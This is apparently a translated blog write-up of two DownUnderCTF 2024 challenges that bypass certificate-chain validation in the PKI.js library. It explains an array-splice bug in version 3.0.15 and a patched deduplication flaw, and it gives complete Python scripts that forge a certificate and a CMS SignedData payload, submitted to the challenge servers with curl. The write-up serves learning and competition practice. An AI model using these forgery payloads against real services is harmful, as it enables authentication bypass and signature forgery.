DownUnderCTF 2024 – PKI.js Exploitation

Rustam Guseinov

Chairman of the cooperative RAD KOP

We continue our series of experimental materials with an analysis of CTF challenges by our friend Ratmir Karabut. You can read the previous installment at the link. And, as has become tradition, we will go a little “meta” and recommend another good book: “Superlearning” by Scott Young (in the original, “Ultralearning”).

Scott Young and his book “Superlearning”

Why is this book so important, and what does it have to do with the CTF challenge? People often hold beliefs that limit their development, such as: I am not good at languages, so I cannot write exploits; I am bad at mathematics, so I will never become a cryptographer; I… (fill in the blank). Scott Young, who worked through MIT's four-year Computer Science curriculum in a single year (the famous Massachusetts Institute of Technology, roughly a counterpart of Russia's Moscow Institute of Physics and Technology), convincingly shows that with the right approach to learning (and self-study) there are no insurmountable obstacles. So if some classes of problems seem difficult or even impossible, don't get frustrated and give up – you need a plan that turns an unsolvable problem into a concrete task. One element of such preparation is so-called drilling: like an athlete honing technique, you polish to perfection the practical element or theoretical block that is hardest for you. So let's continue our journey, it will be even more fun =)

Let's look at two related DownUnderCTF 2024 challenges that require tricking the real cryptographic library PKI.js. They were solved by few teams (the second had only one solve), and while I didn't manage to finish them myself during the competition, the elegance and realism of the vulnerabilities make them good candidates for a detailed analysis.

pkijs< – medium (203 points, 7 solves)

Task materials.

The description gives us a hint – apparently there is some certificate-validation error in version 3.0.15 of PKI.js, which the service under attack uses. Let's take the hint and first check what changed in PKI.js between version 3.0.15 and the current 3.1.0 on GitHub:

Comparing v3.0.15…v3.1.0 · PeculiarVentures/PKI.js · GitHub

Among the commits, an interesting one quickly stands out, and in the pull request tied to it we see a suspicion of incorrect validation when several certificates are passed:

The commit fixes a classic oversight – modifying an array while iterating over it – in three places in the code; we are particularly interested in this part of the defaultFindIssuer() function, which is called (as findIssuer()) from verify():

    ...
    // Now perform certificate verification checking
    for (let i = 0; i < result.length; i++) {
      try {
        const verificationResult = await certificate.verify(result[i], crypto);
        if (verificationResult === false)
          result.splice(i, 1);
      }
      catch (ex) {
        result.splice(i, 1); // Something wrong, remove the certificate
      }
    }
    return result;

The splice() array method shifts the remaining elements into the vacated slot; this means that if, at the moment of verification, the result array holds at least two elements, then after the invalid first one is deleted the check of the second one is skipped – its index becomes 0 while the loop counter moves on to 1 – and result is returned non-empty. From the context it is clear that for findIssuer() this amounts to presuming the certificates left in the array are valid issuers, i.e. trust anchors confirming the authenticity of the end certificate.
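
To make the off-by-one concrete, here is a minimal Python analogue of the same mistake (a sketch, not the PKI.js code): deleting the current element by index shifts its neighbour into the freed slot, and the loop counter then steps right over it.

# Two candidate issuers, both invalid – yet only the first one gets removed.
candidates = ["bogus issuer A", "bogus issuer B"]

i = 0
while i < len(candidates):
    verification_ok = False      # imagine certificate.verify() failing for both entries
    if not verification_ok:
        del candidates[i]        # analogue of result.splice(i, 1)
    i += 1                       # the counter advances anyway, skipping the shifted element

print(candidates)                # ['bogus issuer B'] – a non-empty "issuer" list survives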

It follows that simply supplying the wrong issuer twice tricks the library into believing that issuer resolution actually succeeded – and earlier in the same function we see that result is populated with candidate issuers both from the list of trusted certificates previously passed to verify() and from the list of (presumably intermediate) certificates attached by the end user; so it should be enough to attach a second copy of the root certificate already present in trustedCerts:

    // Search in Trusted Certificates
    for (const trustedCert of validationEngine.trustedCerts) {
      checkCertificate(trustedCert);
    }

    // Search in Intermediate Certificates
    for (const intermediateCert of validationEngine.certs) {
      checkCertificate(intermediateCert);
    }

Now let's look at the attacked service, index.js. It accepts from us a CMS (Cryptographic Message Syntax) structure of type SignedData, which must carry the correct message (I can forge a signed message!) signed with the bundled root certificate root.crt – or, as the verification parameter checkChain: true indicates, with any certificate certified by it, directly or indirectly through a chain; such a chain of certificates is assumed to be attached to the SignedData.

Of course, forging a signature outright without access to the private key of root.crt is beyond us, but what if a bug in the library helps us force the service to accept an arbitrary certificate as trusted?

To begin with, let's create our own certificate – apparently we can sign it with our own private key, not forgetting to put the name of root.crt into the issuer field. After flipping through the documentation for cryptography.x509 and tinkering with the required fields, we produce both the key and the certificate:

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import hashes, serialization
import datetime

root_cert = x509.load_pem_x509_certificate(open("./root.crt", "rb").read())
my_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "hacker")])

privkey = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pubkey = privkey.public_key()

cert = x509.CertificateBuilder() \
    .issuer_name(root_cert.issuer) \
    .subject_name(my_name) \
    .public_key(pubkey) \
    .serial_number(x509.random_serial_number()) \
    .not_valid_before(datetime.datetime.today() - datetime.timedelta(days=1)) \
    .not_valid_after(datetime.datetime.today() + datetime.timedelta(days=1)) \
    .sign(private_key=privkey, algorithm=hashes.SHA256())

der = privkey.private_bytes(
    encoding=serialization.Encoding.DER,
    format=serialization.PrivateFormat.PKCS8,
    encryption_algorithm=serialization.NoEncryption()
)

open("my_key.der", "wb").write(der)
open("my_cert.crt", "wb").write(cert.public_bytes(serialization.Encoding.DER))

The required SignedData structure can be assembled in Python with the asn1crypto library, using its tests as a reference for the required fields (and, surprisingly, as an example of generating an electronic signature for CryptoPro from here). Don't forget to carefully place the service's root certificate next to ours, so that together with the copy in trustedCerts it shows up in the issuer-candidate list twice:

from asn1crypto import cms
from cryptography import x509
from cryptography.hazmat.primitives.serialization import load_der_private_key, Encoding
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

root_cert = x509.load_pem_x509_certificate(open("./root.crt", "rb").read())
my_cert = x509.load_der_x509_certificate(open("./my_cert.crt", "rb").read())

root_cert_der = root_cert.public_bytes(Encoding.DER)
my_cert_der = my_cert.public_bytes(Encoding.DER)

my_key = load_der_private_key(open("./my_key.der", "rb").read(), password=None)
message = b"I can forge a signed message!"
signature = my_key.sign(message, padding.PKCS1v15(), hashes.SHA256())
my_cert_key_id = cms.Certificate.load(my_cert_der).public_key.sha1

my_signed_data = cms.SignedData({
    "version": "v1",
    "encap_content_info": {
        "content_type": "data",
        "content": message
    },
    "certificates": [cms.CertificateChoices.load(cert) for cert in [my_cert_der, root_cert_der]],
    "signer_infos": [
        {
            "version": "v1",
            "digest_algorithm": {
                "algorithm": "sha256",
                "parameters": None
            },
            "signature_algorithm": {
                "algorithm": "sha256_rsa",
                "parameters": None
            },
            "signature": signature,
            "sid": cms.SignerIdentifier({
                "subject_key_identifier": my_cert_key_id
            })
        }
    ],
    "digest_algorithms": [
        {
            "algorithm": "sha256",
            "parameters": None
        }
    ],
})

my_content_info = cms.ContentInfo({
    "content_type": "signed_data",
    "content": my_signed_data
})

open("payload.data", "wb").write(my_content_info.dump())

All that remains is to send the signed message to its destination, as required by the service:

$ curl https://misc-pkijs-lt-e1e6cbc5ad29.2024.ductf.dev/upload -F cms=@./payload.data
DUCTF{nice_splice_sice_a69bdb8eb2ca9e1}⏎

The first flag has been received!

pkijs= – medium (500 points, 1 solve)

Task materials.

In this task, with an otherwise identical service, PKI.js is updated to 3.0.16, which eliminates the previous bug; in exchange the author introduces his own, less obvious one – the following patch is applied to the library:

--- a/node_modules/pkijs/build/index.js
+++ b/node_modules/pkijs/build/index.js
@@ -9256,7 +9256,7 @@ class Certificate extends PkiObject {
 }
 Certificate.CLASS_NAME = "Certificate";
 function checkCA(cert, signerCert = null) {
-    if (signerCert && cert.issuer.isEqual(signerCert.issuer) && cert.serialNumber.isEqual(signerCert.serialNumber)) {
+    if (signerCert && cert.issuer.isEqual(signerCert.issuer) && cert.serialNumber.isEqual(signerCert.serialNumber) && cert.signatureValue.isEqual(signerCert.signatureValue)) {
         return null;
     }
     let isCA = false;

From the comments in the code around this check it is clear that it is meant to guarantee that the certificate which signed the message cannot be mistaken for a CA certificate, even if it is marked with the corresponding CA flag (via the BasicConstraints extension, more on which below); interestingly, the change strengthens this check – where originally it compared only the issuer and serial number with those of the signer, it now also compares the signature value.

As we can see, checkCA() is used in a single place in verify():

      if (checkChain) {
        const certs = this.certificates.filter(certificate => (certificate instanceof Certificate && !!checkCA(certificate, signerCert))) as Certificate[];
        const chainParams: CertificateChainValidationEngineParameters = {
          checkDate,
          certs,
          trustedCerts,
        };

The !! here (don't be misled – it cost me some time to untangle the code, given my unfamiliarity with JS) is double negation, used to coerce a value to a boolean – that is, the list of certificates attached to the SignedData is filtered down to CAs, so that everything except the final signer (appended afterwards as the last element) belongs to the certification chain.

Since checkCA() itself is relevant only in this one place, let's see where else parsedValue.CA is checked – and indeed, in CertificateChainValidationEngine this is done later, in another place, by the checkForCA() function, this time without any regard for the signer. checkForCA(), in turn, is used in only two places – one of them is of no interest to us, since it concerns CRLs, which are not used in our case, while the second re-verifies that all intermediate certificates are CAs:

...
        const result = await checkForCA(cert);
        if (!result.result) {
          return {
            result: false,
            resultCode: 14,
            resultMessage: "One of intermediate certificates is not a CA certificate"
          };
        }

What unusual thing can we do with checkCA()'s condition now that it has been extended this way? The only thing that comes to mind: by altering signatureValue (which would not pass real verification anyway, since the certificate is self-signed), we can make a copy of our own certificate land in the list of intermediates – provided it also carries the CA attribute.
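
To see the effect of the extended comparison, here is a rough Python model of checkCA() (my own sketch, not the library code): the genuine signer is excluded from the intermediates, while an otherwise identical certificate whose signature bytes have been tampered with no longer matches the new condition and, carrying the CA flag, is kept.

from dataclasses import dataclass

@dataclass
class Cert:
    issuer: str
    serial: int
    signature: bytes
    is_ca: bool

def check_ca(cert, signer_cert=None):
    # the signer itself must never count as a CA, even if it carries the CA flag
    if (signer_cert is not None
            and cert.issuer == signer_cert.issuer
            and cert.serial == signer_cert.serial
            and cert.signature == signer_cert.signature):  # the comparison added by the patch
        return None
    return cert if cert.is_ca else None

signer = Cert("DUCTF root", 1337, b"real signature", is_ca=True)
tampered = Cert("DUCTF root", 1337, b"deadbeef", is_ca=True)  # same certificate, signature bytes flipped

print(check_ca(signer, signer))     # None – the signer stays out of the intermediates
print(check_ca(tampered, signer))   # Cert(...) – the tampered copy slips through the filter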

But how can a duplicate of our own certificate help us? Let's look at the code that removes identical (presumably duplicated intermediate) certificates from the list:

    //#region Check all certificates for been unique
    for (let i = 0; i < localCerts.length; i++) {
      for (let j = 0; j < localCerts.length; j++) {
        if (i === j)
          continue;

        if (pvtsutils.BufferSourceConverter.isEqual(localCerts[i].tbsView, localCerts[j].tbsView)) {
          localCerts.splice(j, 1);
          i = 0;
          break;
        }
      }
    }
    //#endregion

    const leafCert = localCerts[localCerts.length - 1]; 

    //#region Initial variables
    let result;
    const certificatePath = [leafCert]; // The "end entity" certificate must be the least in CERTS array
    //#endregion

Equivalence is checked with the tbsView field, which is not affected by signatureValue – so our self-signed certificate, which lands in localCerts twice with different signatureValue (once as an intermediate and once as the signer), will be treated as one and the same certificate.

But the loop removes the right-hand copy from the list! This means that our certificate, encountered twice, will be removed from the last position – and the certificate listed immediately before it will be taken as the final leafCert instead. If that happens to be the trusted root.crt, this should be enough to bypass authentication – the comments make it clear the code does not expect this to be possible.

But how do we arrange this? If we simply add root.crt to the list, it will be deleted even earlier, since another copy of it sits further to the left as part of trustedCerts. Wait, though – is i being reset correctly in the loop?

After i = 0; break the outer loop moves on to its next iteration, so i is immediately incremented to 1; in a normal situation this probably matters little to the library, since all that changes is that in some circumstances the left copy gets deleted instead of the right one – j still walks the whole list. But with our patch this is exactly what we need – take the following order of certificates:

  1. (trustedCerts) root

  2. my_cert (with modified signatureValue)

  3. root

  4. root

  5. my_cert (signer)

Let's trace the loop: certificate 3 is removed first (it matches the trusted certificate 1); since i is reset not to 0 but, after the increment, to 1, the next match is the pair of our certificates, and the last one – certificate 5, the signer – is removed; finally, the remaining attached copy of root.crt matches the trusted certificate 1, which is removed from the list. That leaves two certificates – ours (with the tampered signature) and the root, in exactly that order – forcing the library to accept the root as the final (leaf) certificate.
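
Since there are several moving parts here, a small Python re-enactment of the deduplication loop (my own model of the JS code above, with certificates reduced to their tbs identity) confirms the trace:

# Each certificate is modelled as (label, tbs): equal tbs means "duplicate" to the loop,
# regardless of the signature bytes.
local_certs = [
    ("root (trusted)", "root-tbs"),
    ("my_cert (tampered sig)", "my-tbs"),
    ("root", "root-tbs"),
    ("root", "root-tbs"),
    ("my_cert (signer)", "my-tbs"),
]

i = 0
while i < len(local_certs):
    for j in range(len(local_certs)):
        if i == j:
            continue
        if local_certs[i][1] == local_certs[j][1]:  # compare the tbsView analogues
            local_certs.pop(j)                      # localCerts.splice(j, 1)
            i = 0                                   # the "reset" that is immediately incremented...
            break
    i += 1                                          # ...here, so the next pass starts at i = 1

print([label for label, _ in local_certs])
# ['my_cert (tampered sig)', 'root'] – the trusted root ends up as the leaf certificate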

Let's test this theory – first, add the CA flag to our certificate:

...
    .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=False)

Second, let's place the certificates into the SignedData list in the right order, corrupting the signatureValue section in the first occurrence of ours – it turns out that for this it is enough to replace the last few bytes of the DER:

...
"certificates": [cms.CertificateChoices.load(cert) for cert in
    # keep the DER length unchanged: drop the last 8 bytes of the signature, substitute 8 bytes of garbage
    [my_cert_der[:-8] + b'deadbeef', root_cert_der, root_cert_der, my_cert_der]
],
...
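
A quick way to convince ourselves the tampering does what we want (a sketch reusing my_cert_der from the script above): the mangled copy must still parse, keep the same to-be-signed bytes – which is all the deduplication compares – and differ only in the signature value.

from asn1crypto import x509 as asn1_x509

original = asn1_x509.Certificate.load(my_cert_der)
tampered = asn1_x509.Certificate.load(my_cert_der[:-8] + b'deadbeef')

assert original["tbs_certificate"].dump() == tampered["tbs_certificate"].dump()
assert original["signature_value"].native != tampered["signature_value"].native
print("tbs identical, signature differs – exactly what checkCA() and the deduplication see")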

Let's feed the resulting payload to the server:

$ curl https://misc-pkijs-eq-91b37b2852e3.2024.ductf.dev/upload -F cms=@./payload.data
DUCTF{deduplicate_and_decimate_07bca839bad0b201b9d}⏎  

The second flag is ours!

Conclusion

Good challenges on exploiting real software are not that common, and the minimalism of the bugs deserves particular respect. Unfortunately, the second task, as the number of solves shows, turned out to be quite hard even for a two-day CTF – the solution logic described here was, of course, accompanied by a fair amount of dynamic debugging (fortunately, that was not so difficult to do with the container from the handout, by applying on top of the original patch another one with console.log() calls generously scattered throughout the library). Overall, the Australian DownUnderCTF was excellent in quality and presentation this year – and hopefully will stay that way in the future.
